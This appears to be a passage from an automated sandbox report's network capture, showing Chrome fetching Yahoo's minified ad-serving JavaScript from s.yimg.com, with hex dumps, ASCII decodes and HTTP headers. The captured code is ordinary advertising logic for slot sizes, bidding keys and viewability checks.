                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 6e 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 77 69 64 74 68 2e 6d 69 6e 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 77 2e 6d 69 6e 29 2c 31 30 29 29 2c 65 2e 66 6c 65 78 2e 77 2e 6d 61 78 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 77 69 64 74 68 2e 6d 61 78 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 77 2e 6d 61 78 29 2c 31 30 29 29 29 2c 65 2e 66 6c 65 78 2e 68 3f 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 68 65 69 67 68 74 3d 7b 65 6e 61 62 6c 65 64 3a 21 30 7d 2c 65 2e 66 6c 65 78 2e 68 2e 6d 69 6e 26 26 28 6f 2e 66 6c 65 78 69 62 6c 65 2e 68 65 69 67 68 74 2e 6d 69 6e 3d 70 61 72 73 65 49 6e 74 28 53 74 72 69 6e 67 28 65 2e 66 6c 65 78 2e 68 2e 6d 69 6e 29 2c 31 30 29 29 2c 65 2e 66 6c 65 78 2e 68 2e 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n&&(o.flexible.width.min=parseInt(String(e.flex.w.min),10)),e.flex.w.max&&(o.flexible.width.max=parseInt(String(e.flex.w.max),10))),e.flex.h?(o.flexible.height={enabled:!0},e.flex.h.min&&(o.flexible.height.min=parseInt(String(e.flex.h.min),10)),e.flex.h.m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 65 2e 6c 65 6e 67 74 68 3b 29 6f 2b 2b 2c 69 3d 65 2e 63 68 61 72 41 74 28 6f 29 2c 74 3d 21 30 3b 74 26 26 6f 2d 2d 7d 7d 2c 73 3d 6e 3d 3e 7b 69 66 28 6f 2b 31 3c 65 2e 6c 65 6e 67 74 68 29 7b 66 6f 72 28 69 3d 65 2e 63 68 61 72 41 74 28 6f 2b 31 29 2c 6f 2b 2b 3b 69 21 3d 3d 6e 26 26 6f 2b 31 3c 65 2e 6c 65 6e 67 74 68 3b 29 74 2b 3d 69 2c 69 3d 65 2e 63 68 61 72 41 74 28 6f 2b 31 29 2c 6f 2b 2b 3b 69 21 3d 3d 6e 26 26 28 74 2b 3d 69 29 7d 7d 3b 66 6f 72 28 6f 3d 30 3b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 69 3d 65 2e 63 68 61 72 41 74 28 6f 29 2c 22 3d 22 3d 3d 3d 69 3f 28 74 26 26 28 6e 2e 70 75 73 68 28 74 29 2c 74 3d 22 22 29 2c 61 28 29 29 3a 27 22 27 3d 3d 3d 69 3f 28 74 26 26 28 6e 2e 70 75 73 68 28 74 29 2c 74 3d 22 22 29 2c 73 28 27 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e.length;)o++,i=e.charAt(o),t=!0;t&&o--}},s=n=>{if(o+1<e.length){for(i=e.charAt(o+1),o++;i!==n&&o+1<e.length;)t+=i,i=e.charAt(o+1),o++;i!==n&&(t+=i)}};for(o=0;o<e.length;o++)i=e.charAt(o),"="===i?(t&&(n.push(t),t=""),a()):'"'===i?(t&&(n.push(t),t=""),s('"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 66 6f 72 6d 44 61 72 6c 61 50 6f 73 69 74 69 6f 6e 43 6f 6e 66 54 6f 4a 61 63 29 28 6e 29 3b 6f 26 26 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 26 26 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 2e 68 6f 73 74 55 52 4c 7c 7c 21 67 7c 7c 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 7c 7c 28 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 3d 7b 68 6f 73 74 55 52 4c 3a 22 22 7d 29 2c 6f 2e 63 6c 69 65 6e 74 2e 6d 65 74 61 2e 68 6f 73 74 55 52 4c 3d 67 29 2c 28 30 2c 74 2e 75 70 64 61 74 65 52 6f 74 61 74 69 6f 6e 43 6f 6e 66 46 72 6f 6d 41 75 74 6f 45 76 65 6e 74 29 28 75 2c 65 2c 6f 2e 63 6c 69 65 6e 74 29 2c 64 2e 73 65 72 76 69 63 65 2e 70 6f 73 69 74 69 6f 6e 73 5b 65 5d 3d 6f 2e 73 65 72 76 69 63 65 2c 64 2e 63 6c 69 65 6e 74 2e 70 6f 73 69 74 69 6f 6e 73 5b 65 5d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: formDarlaPositionConfToJac)(n);o&&(o.client.meta&&o.client.meta.hostURL||!g||(o.client.meta||(o.client.meta={hostURL:""}),o.client.meta.hostURL=g),(0,t.updateRotationConfFromAutoEvent)(u,e,o.client),d.service.positions[e]=o.service,d.client.positions[e]=o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 69 6e 65 72 22 29 29 26 26 28 76 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 29 7c 7c 76 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 29 26 26 76 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 48 74 2d 70 6c 2d 4c 44 52 42 22 2c 22 48 74 2d 70 6c 2d 4c 52 45 43 22 29 7d 76 61 72 20 70 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 61 2e 72 65 73 70 6f 6e 73 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 70 6f 73 69 74 69 6f 6e 73 3b 69 66 28 70 26 26 70 2e 4d 4f 4e 32 26 26 70 2e 4c 52 45 43 33 26 26 70 2e 4c 52 45 43 34 29 7b 76 61 72 20 6d 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 70 2e 4d 4f 4e 32 2e 63 6f 6e 74 65 6e 74 29 7c 7c 76 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: iner"))&&(v.classList.contains("Ht-pl-LDRB")||v.classList.contains("Ht-pl-LREC"))&&v.classList.remove("Ht-pl-LDRB","Ht-pl-LREC")}var p=null===(o=a.response)||void 0===o?void 0:o.positions;if(p&&p.MON2&&p.LREC3&&p.LREC4){var m=null===(i=p.MON2.content)||vo


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              77192.168.2.45109887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC360OUTGET /aaq/benji/benji-2.1.133.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: dyYFVqVjTxpRXe07GqBR220XYkMwx+16l1S5EDKcf1EKDzDgf4rOSilKiJUOsx1pKHo5hfNUzs8=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 7DBYS7FEGC9TMSFG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 11:42:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 04 Oct 2024 18:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "cb03350d0c32631bb2f75a6c7b4164c0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: baHvfzxADovYFxvmfOzd9HdgW_GgmI9_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 88659
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 27088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 7b 61 73 73 65 72 74 69 76 65 3a 7b 7d 2c 62 65 6e 6a 69 3a 7b 7d 2c 67 6f 6f 67 6c 65 74 61 67 3a 7b 63 6d 64 3a 5b 5d 7d 2c 70 62 6a 73 3a 7b 71 75 65 3a 5b 5d 7d 2c 59 41 48 4f 4f 3a 7b 7d 7d 3b 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 3d 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 7c 7c 28 65 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 65 2e 6d 61 70 28 28 65 3d 3e 65 2e 74 68 65 6e 28 28 65 3d 3e 28 7b 73 74 61 74 75 73 3a 22 66 75 6c 66 69 6c 6c 65 64 22 2c 76 61 6c 75 65 3a 65 7d 29 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 28 7b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 31 33 33 31 2c 49 6e 66 69 6e 69 74 79 22 3a 5b 31 36 2c 33 5d 2c 22 34 38 31 2c 31 33 33 30 22 3a 5b 34 30 2c 39 5d 7d 2c 73 69 7a 65 3a 5b 33 2c 31 5d 7d 2c 4c 69 67 68 74 68 6f 75 73 65 3a 7b 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 22 30 2c 49 6e 66 69 6e 69 74 79 22 3a 5b 39 2c 31 36 5d 7d 2c 73 69 7a 65 3a 5b 32 2c 32 5d 7d 2c 53 6d 61 72 74 41 73 73 65 74 57 69 64 67 65 74 4c 61 72 67 65 3a 7b 73 69 7a 65 3a 5b 38 30 30 2c 36 33 35 5d 7d 2c 53 70 6f 74 6c 69 67 68 74 3a 7b 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 22 30 2c 34 38 30 22 3a 5b 38 2c 39 5d 7d 2c 73 69 7a 65 3a 5b 33 2c 32 5d 7d 2c 54 72 61 64 65 4e 6f 77 3a 7b 73 69 7a 65 3a 5b 32 38 30 2c 35 35 5d 7d 7d 2c 6b 3d 7b 22 5b 31 34 34 30 2c 31 30 32 34 5d 22 3a 22 4c 6f 67 69 6e 22 2c 22 5b 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1331,Infinity":[16,3],"481,1330":[40,9]},size:[3,1]},Lighthouse:{breakpoints:{"0,Infinity":[9,16]},size:[2,2]},SmartAssetWidgetLarge:{size:[800,635]},Spotlight:{breakpoints:{"0,480":[8,9]},size:[3,2]},TradeNow:{size:[280,55]}},k={"[1440,1024]":"Login","[2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 7d 2c 51 3d 7b 63 6c 69 63 6b 3a 22 63 6c 69 63 6b 22 2c 6e 6f 63 6f 6e 74 65 6e 74 3a 22 6e 6f 63 6f 6e 74 65 6e 74 22 2c 72 65 6e 64 65 72 3a 22 72 65 6e 64 65 72 22 7d 2c 4a 3d 22 61 75 63 74 69 6f 6e 45 6e 64 22 2c 4b 3d 22 61 75 63 74 69 6f 6e 49 6e 69 74 22 2c 58 3d 22 62 69 64 57 6f 6e 22 2c 5a 3d 7b 65 30 3a 22 2d 65 30 22 2c 65 31 3a 22 2d 65 31 22 2c 45 49 44 53 5f 55 52 4c 3a 22 69 64 78 2e 6c 69 61 64 6d 2e 63 6f 6d 22 2c 48 42 5f 55 49 5f 4d 4f 44 3a 22 68 62 5f 75 69 64 5f 6d 6f 64 22 2c 4c 49 5f 4f 46 46 3a 22 6c 69 76 65 49 6e 74 65 6e 74 49 64 5f 6f 66 66 22 2c 4c 49 5f 4f 4e 5f 45 4e 52 49 43 48 45 44 3a 22 6c 69 76 65 69 6e 74 65 6e 74 69 64 5f 6f 6e 5f 65 6e 72 69 63 68 65 64 22 2c 4c 49 5f 4f 4e 5f 4e 4f 54 5f 45 4e 52 49 43 48 45 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: },Q={click:"click",nocontent:"nocontent",render:"render"},J="auctionEnd",K="auctionInit",X="bidWon",Z={e0:"-e0",e1:"-e1",EIDS_URL:"idx.liadm.com",HB_UI_MOD:"hb_uid_mod",LI_OFF:"liveIntentId_off",LI_ON_ENRICHED:"liveintentid_on_enriched",LI_ON_NOT_ENRICHED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 22 6d 6f 6e 65 79 22 2c 65 2e 6d 6f 76 69 65 73 3d 22 6d 6f 76 69 65 73 22 2c 65 2e 6d 75 73 69 63 3d 22 6d 75 73 69 63 22 2c 65 2e 6e 65 77 73 3d 22 6e 65 77 73 22 2c 65 2e 72 69 76 61 6c 73 3d 22 72 69 76 61 6c 73 22 2c 65 2e 73 70 6f 72 74 73 3d 22 73 70 6f 72 74 73 22 2c 65 2e 73 74 79 6c 65 3d 22 73 74 79 6c 65 22 2c 65 2e 74 65 63 68 3d 22 74 65 63 68 22 2c 65 2e 74 65 63 68 63 72 75 6e 63 68 3d 22 74 65 63 68 63 72 75 6e 63 68 22 7d 28 61 65 7c 7c 28 61 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 79 61 68 6f 6f 5f 6d 61 69 6c 3d 22 79 61 68 6f 6f 5f 6d 61 69 6c 22 2c 65 2e 61 6f 6c 5f 77 65 62 6d 61 69 6c 3d 22 61 6f 6c 5f 77 65 62 6d 61 69 6c 22 2c 65 2e 79 61 68 6f 6f 5f 72 6f 67 65 72 73 5f 6d 61 69 6c 3d 22 79 61 68 6f 6f 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "money",e.movies="movies",e.music="music",e.news="news",e.rivals="rivals",e.sports="sports",e.style="style",e.tech="tech",e.techcrunch="techcrunch"}(ae||(ae={})),function(e){e.yahoo_mail="yahoo_mail",e.aol_webmail="aol_webmail",e.yahoo_rogers_mail="yahoo_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 63 65 2e 79 61 68 6f 6f 5f 61 74 74 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 63 65 2e 79 61 68 6f 6f 5f 66 72 6f 6e 74 69 65 72 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 63 65 2e 79 61 68 6f 6f 5f 76 65 72 69 7a 6f 6e 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 63 65 2e 61 6f 6c 5f 77 65 62 6d 61 69 6c 5d 3a 22 64 32 75 65 76 33 69 33 36 35 7a 35 71 38 22 2c 5b 63 65 2e 79 61 68 6f 6f 5f 6c 6f 67 69 6e 5d 3a 22 64 31 74 71 72 73 37 76 7a 39 34 64 39 6b 22 2c 5b 63 65 2e 61 6f 6c 5f 6c 6f 67 69 6e 5d 3a 22 64 33 61 78 68 35 65 6d 67 35 65 63 65 30 22 2c 64 65 66 61 75 6c 74 3a 22 64 39 70 6d 73 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: _mail]:"d49ph8jz3wewg",[ce.yahoo_att_mail]:"d49ph8jz3wewg",[ce.yahoo_frontier_mail]:"d49ph8jz3wewg",[ce.yahoo_verizon_mail]:"d49ph8jz3wewg",[ce.aol_webmail]:"d2uev3i365z5q8",[ce.yahoo_login]:"d1tqrs7vz94d9k",[ce.aol_login]:"d3axh5emg5ece0",default:"d9pmsg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 31 32 30 38 31 2c 31 31 39 37 38 31 32 30 38 32 2c 31 31 39 37 38 31 32 30 38 33 2c 39 36 33 39 39 38 38 35 34 2c 31 31 38 33 38 33 36 31 39 33 2c 31 31 39 37 38 31 32 31 35 30 2c 31 31 39 37 38 31 32 31 34 36 2c 31 31 39 37 38 31 32 31 32 38 2c 31 31 39 37 38 31 32 31 32 35 2c 31 31 39 37 38 31 32 31 32 36 2c 31 31 39 37 38 31 32 31 32 37 2c 31 31 39 37 38 31 32 31 33 33 2c 31 31 39 37 38 31 32 31 33 32 2c 31 31 39 37 38 31 32 31 33 34 2c 31 31 39 37 38 31 32 31 32 39 2c 31 31 39 37 38 31 32 31 33 30 2c 31 31 39 37 38 31 32 31 33 31 2c 31 31 38 37 33 33 36 32 30 31 2c 39 36 34 32 39 38 38 35 34 2c 31 31 38 37 33 33 36 32 30 32 2c 31 31 39 37 38 31 32 31 35 33 2c 31 31 39 37 38 31 32 31 35 34 2c 31 31 39 37 38 31 32 31 35 35 2c 31 31 39 37 38 31 32 31 35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 12081,1197812082,1197812083,963998854,1183836193,1197812150,1197812146,1197812128,1197812125,1197812126,1197812127,1197812133,1197812132,1197812134,1197812129,1197812130,1197812131,1187336201,964298854,1187336202,1197812153,1197812154,1197812155,119781215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 6e 74 22 2c 5b 61 65 2e 66 69 6e 61 6e 63 65 5d 3a 22 79 66 69 6e 22 2c 5b 61 65 2e 66 70 5d 3a 22 79 68 70 22 2c 5b 61 65 2e 67 6d 61 5d 3a 22 79 6e 65 77 73 22 2c 5b 61 65 2e 6c 69 66 65 73 74 79 6c 65 5d 3a 22 79 6c 69 66 65 22 2c 5b 61 65 2e 6d 6f 6e 65 79 5d 3a 22 79 66 69 6e 22 2c 5b 61 65 2e 6d 6f 76 69 65 73 5d 3a 22 79 6d 6f 76 22 2c 5b 61 65 2e 6d 75 73 69 63 5d 3a 22 79 65 6e 74 22 2c 5b 61 65 2e 6e 65 77 73 5d 3a 22 79 6e 65 77 73 22 2c 5b 61 65 2e 73 70 6f 72 74 73 5d 3a 22 79 73 70 6f 72 74 73 22 2c 5b 61 65 2e 73 74 79 6c 65 5d 3a 22 79 6c 69 66 65 22 2c 5b 61 65 2e 74 65 63 68 5d 3a 22 79 74 65 63 68 22 7d 2c 6b 65 3d 5b 22 63 6f 6d 6d 65 72 63 65 41 72 74 69 63 6c 65 54 79 70 65 22 2c 22 65 78 74 72 61 63 74 65 64 4b 65 79 57 6f 72 64 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nt",[ae.finance]:"yfin",[ae.fp]:"yhp",[ae.gma]:"ynews",[ae.lifestyle]:"ylife",[ae.money]:"yfin",[ae.movies]:"ymov",[ae.music]:"yent",[ae.news]:"ynews",[ae.sports]:"ysports",[ae.style]:"ylife",[ae.tech]:"ytech"},ke=["commerceArticleType","extractedKeyWords
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 30 30 5f 36 30 30 22 5d 2c 74 6f 70 5f 72 69 67 68 74 5f 73 74 61 63 6b 3a 5b 22 4c 52 45 43 22 2c 22 4d 4f 4e 22 5d 7d 2c 51 65 3d 5b 22 61 79 5f 66 6c 6f 6f 72 22 2c 22 61 79 5f 66 6c 6f 6f 72 5f 6d 22 2c 22 61 79 5f 66 6c 6f 6f 72 5f 67 22 2c 22 61 79 5f 68 61 73 68 22 2c 22 68 62 5f 61 64 6f 6d 61 69 6e 22 2c 22 68 62 5f 61 64 69 64 22 2c 22 68 62 5f 62 69 64 64 65 72 22 2c 22 68 62 5f 62 69 64 64 65 72 5f 73 65 61 74 69 64 22 2c 22 68 62 5f 63 61 63 68 65 5f 68 6f 73 74 22 2c 22 68 62 5f 63 61 63 68 65 5f 69 64 22 2c 22 68 62 5f 63 61 63 68 65 5f 70 61 74 68 22 2c 22 68 62 5f 63 61 63 68 65 5f 72 65 67 69 6f 6e 22 2c 22 68 62 5f 63 72 69 64 22 2c 22 68 62 5f 64 65 61 6c 22 2c 22 68 62 5f 64 73 70 22 2c 22 68 62 5f 64 74 22 2c 22 68 62 5f 66 6f 72 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 00_600"],top_right_stack:["LREC","MON"]},Qe=["ay_floor","ay_floor_m","ay_floor_g","ay_hash","hb_adomain","hb_adid","hb_bidder","hb_bidder_seatid","hb_cache_host","hb_cache_id","hb_cache_path","hb_cache_region","hb_crid","hb_deal","hb_dsp","hb_dt","hb_form
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 2c 6f 3d 44 61 74 65 2e 6e 6f 77 28 29 7d 29 29 7d 63 6f 6e 73 74 20 73 74 3d 22 64 65 66 61 75 6c 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 69 2c 73 2c 6f 2c 72 2c 61 3d 2d 31 3b 69 66 28 22 75 70 22 3d 3d 3d 6e 29 66 6f 72 28 69 3d 65 2e 74 6f 70 2c 73 3d 65 2e 62 6f 74 74 6f 6d 3b 69 3c 3d 73 3b 29 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 2b 73 29 2f 32 29 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 46 72 6f 6d 50 6f 69 6e 74 28 65 2e 6c 65 66 74 2c 61 29 2c 6f 3d 3d 3d 74 3f 73 3d 61 2d 31 3a 69 3d 61 2b 31 3b 65 6c 73 65 20 69 66 28 22 64 6f 77 6e 22 3d 3d 3d 6e 29 66 6f 72 28 69 3d 65 2e 74 6f 70 2c 73 3d 65 2e 62 6f 74 74 6f 6d 3b 69 3c 3d 73 3b 29 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,o=Date.now()}))}const st="default";function ot(e,t,n){let i,s,o,r,a=-1;if("up"===n)for(i=e.top,s=e.bottom;i<=s;)a=Math.floor((i+s)/2),o=document.elementFromPoint(e.left,a),o===t?s=a-1:i=a+1;else if("down"===n)for(i=e.top,s=e.bottom;i<=s;)a=Math.floor((i+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 28 7b 62 6f 74 74 6f 6d 3a 64 2c 6c 65 66 74 3a 72 2c 72 69 67 68 74 3a 61 2c 74 6f 70 3a 63 7d 2c 74 29 29 7b 63 6f 6e 73 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 7b 74 6f 70 3a 69 2c 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 7d 3d 65 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 6f 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 69 7d 2c 74 2c 22 75 70 22 29 2c 61 3d 6f 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 64 6f 77 6e 22 29 2c 63 3d 6f 74 28 7b 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eturn!0}return!1}({bottom:d,left:r,right:a,top:c},t)){const e=function(e,t,n){const{top:i,bottom:s,left:o,right:r}=e;try{const e=ot({bottom:s,left:o,right:r,top:i},t,"up"),a=ot({bottom:s,left:o,right:r,top:e},t,"down"),c=ot({bottom:a,left:o,right:r,top:e}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              78192.168.2.45110087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC549OUTGET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC699INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: sAelDtOyB5xYbq7rgOv5WNgIHVKGEk5bakKhPDxJPzLyC5X8tFja3WpOKgQzqDID/u4QgSVBkJI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 3NV90F58HWBHG5W6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 27 Sep 2024 16:19:14 GMT
